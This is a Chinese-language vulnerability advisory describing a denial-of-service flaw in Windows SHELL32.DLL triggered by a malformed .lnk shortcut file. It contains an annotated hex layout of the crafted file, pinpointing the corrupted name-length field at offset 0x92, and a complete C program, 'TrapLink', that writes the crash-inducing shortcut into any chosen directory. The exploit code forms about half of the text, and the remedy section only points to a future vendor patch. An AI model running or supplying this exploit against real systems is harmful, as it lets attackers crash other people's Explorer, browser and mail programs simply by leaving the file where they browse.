SHELL32.DLL存在DoS缺陷
涉及程序:
SHELL32.DLL
描述:
SHELL32.DLL存在DoS缺陷
详细:
SHELL32.DLL存在缺陷,当用户试图用SHELL32.DLL库(比如IE、Outlook)去访问攻击者提供的恶意程序或其他信息(比如目录、驱动、邮件)时,能导致任何程序崩溃。当用户在硬盘上浏览文件时,Windows自动分析当前目录的所有文件,因此允许系统显示匹配的文件图标。Windows分析某个路径(*.lnk)将使用到下列构造:
+-------------------------------------------------------------------+
| Shortcut HEADER |
+-------------------------------------------------------------------+
00000000 4C00 0000 L... 'L' Magic value
00000004 0114 0200 .... GUID of shurtcut files
00000008 0000 0000 ....
00000008 C000 0000 ....
00000010 0000 0046 ...F
00000014 8900 0000 .... Flag
00000018 2000 0000 ... File attribute
0000001C A0C3 D5A8 .... Time 1
00000020 478E C301 G...
00000024 A0C3 D5A8 .... Time 2
00000028 478E C301 G...
0000002C A0C3 D5A8 .... Time 3
00000030 478E C301 G...
00000034 0000 0000 .... File length (here 0 bytes)
00000038 0000 0000 .... Icone number (no icon for us)
0000003C 0100 0000 .... Normal window
00000040 0000 0000 .... shortcut (no)
00000044 0000 0000 .... unknow/reserved
00000048 0000 0000 .... unknow/reserved
+-------------------------------------------------------------------+
| Item Id List |
+-------------------------------------------------------------------+
0000004C 4600 F. Size of item id list
+-------------------------------------------------------------------+
| First item |
+-------------------------------------------------------------------+
0000004E 1400 .. Lenght of first item
00000050 1F50 .P ???
00000052 E04F D020 .O. File lenght
00000056 EA3A 6910 .:i. ???
+-------------------------------------------------------------------+
| data... |
+-------------------------------------------------------------------+
0000005A A2D8 0800 2B30 309D 1900 2343 3A5C 0000 ....+00...#C:\..
0000006A 0000 0000 0000 0000 0000 0000 0000 0051 ...............Q
0000007A 8417 0032 0000 0000 0049 2F87 4B20 006B ...2.....I/.K .k
0000008A 7574 2E74 7874 0000 ut.txt..
+-------------------------------------------------------------------+
| vulnerable bytes |
+-------------------------------------------------------------------+
00000092 0000 0900 .... name lenght
00000096 2E00 ..
00000098 5C00 6B00 7500 7400 2E00 7400 7800 7400 \.k.u.t...t.x.t. name in wide char `
+-------------------------------------------------------------------+
| data... |
+-------------------------------------------------------------------+
000000A8 6000 0000 0300 00A0 5800 0000 0000 0000 `.......X.......
000000B8 6932 732D 7732 6B00 0000 0000 0000 0000 i2s-w2k.........
000000C8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V.
000000D8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................
000000E8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V.
000000F8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................
00000108 0000 0000 00
如果更改文件名长度偏移量0x92,SHELL32.DLL将产生一个存取违例错误,能触发DoS攻击。
攻击方法:
示例代码:
#include <windows.h>
void main (int argc, char *argv[])
{
HANDLE TrapFile;
DWORD NumberOfBytesWritten;
unsigned char LnkCrash[] =
"\x4C\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00"
"\x00\x00\x00\x46\x89\x00\x00\x00\x20\x00\x00\x00\xA0\xC3\xD5\xA8"
"\x47\x8E\xC3\x01\xA0\xC3\xD5\xA8\x47\x8E\xC3\x01\xA0\xC3\xD5\xA8"
"\x47\x8E\xC3\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x46\x00\x14\x00"
"\x1F\x50\xE0\x4F\xD0\x20\xEA\x3A\x69\x10\xA2\xD8\x08\x00\x2B\x30"
"\x30\x9D\x19\x00\x23\x43\x3A\x5C\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x51\x84\x17\x00\x32\x00\x00"
"\x00\x00\x00\x49\x2F\x87\x4B\x20\x00\x6B\x75\x74\x2E\x74\x78\x74"
"\x00\x00\xFF\xFF\x09\x00\x2E\x00\x5C\x00\x6B\x00\x75\x00\x74\x00"
"\x2E\x00\x74\x00\x78\x00\x74\x00\x60\x00\x00\x00\x03\x00\x00\xA0"
"\x58\x00\x00\x00\x00\x00\x00\x00\x69\x32\x73\x2D\x77\x32\x6B\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x6E\xA1\xE9\xB2\x1B\x23\x6B\x46"
"\xB8\x04\x8E\x43\xF3\x38\x56\xF0\x0E\xDC\xEB\x90\xA1\xF8\xD7\x11"
"\xA4\x1B\x00\xEE\xB0\x00\xDA\xC9\x6E\xA1\xE9\xB2\x1B\x23\x6B\x46"
"\xB8\x04\x8E\x43\xF3\x38\x56\xF0\x0E\xDC\xEB\x90\xA1\xF8\xD7\x11"
"\xA4\x1B\x00\xEE\xB0\x00\xDA\xC9\x00\x00\x00\x00";
printf ("################################\n"
"TrapLink SHELL32.dll DoS exploit\n"
"################################\n"
"By I2S-LAB Team.\n\n"
"http://www.I2S-LaB.com\n\n" );
if (!argv[1])
printf ("Usage : TrapLink <path to trap>\n", argv[0]);
else
{
if ( !SetCurrentDirectory(argv[1]) )
printf ("Error : %s is not a valid directory to trap\n", argv[1] );
else
{
TrapFile = CreateFile("I2S-Crash.lnk",
GENERIC_WRITE, 0,
NULL, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL, NULL );
if (TrapFile == INVALID_HANDLE_VALUE)
printf ("Error : cannot create malicious file.\n");
else
{
WriteFile (TrapFile, LnkCrash, sizeof (LnkCrash), &NumberOfBytesWritten, NULL);
printf ("%s is now trapped with a malicious LNK file\n", argv[1] );
}
}
}
}
解决方案:
Microsoft 承诺将在下一个安全补丁中修正该缺陷,请用户及时关注厂商站点:
http://www.microsoft.com
附加信息:
无